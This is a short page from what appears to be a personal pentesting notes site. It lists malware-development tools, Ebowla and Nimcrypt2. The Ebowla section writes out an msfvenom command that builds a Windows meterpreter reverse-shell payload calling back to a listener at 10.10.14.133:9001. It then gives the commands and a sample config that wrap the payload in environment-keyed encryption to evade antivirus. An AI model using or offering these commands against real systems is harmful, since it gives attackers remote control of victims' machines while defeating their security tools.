> For the complete documentation index, see [llms.txt](https://notes.morph3.blog/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://notes.morph3.blog/malware-development/tools.md).

# Tools

## Ebowla

We encode a payload that gets dynamically decoded in the run time on the box. For example we use environment variables for encoding like username, computer name etc.

* <https://github.com/Genetic-Malware/Ebowla>

```
msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.133 LPORT=9001 -f exe > shell.exe
./ebowla.py shell.exe genetic.config
./build_x64_go.sh output/go_symmetric_shell.exe.go morph3-ebowla.exe
```

An example genetic.config,

```
...
     output_type = GO 
...
        [[ENV_VAR]]
        username = 'morph3'
        computername = ''
        homepath = ''
        homedrive = ''
        Number_of_processors = ''
        processor_identifier = ''
        processor_revision = ''
        userdomain = 'acme'
        systemdrive = ''
        userprofile = ''
        path = ''
        temp = ''
```

## Nimcrypt2

* <https://github.com/icyguider/Nimcrypt2>

* [https://twitter.com/binitamshah/status/1594698510762332160?s=46\&t=LDLfp0MIS1Dsg420TRpKXA](<https://twitter.com/binitamshah/status/1594698510762332160?s=46\&t=LDLfp0MIS1Dsg420TRpKXA&#xA;>)

* [<br>](<https://twitter.com/binitamshah/status/1594698510762332160?s=46\&t=LDLfp0MIS1Dsg420TRpKXA&#xA;>)
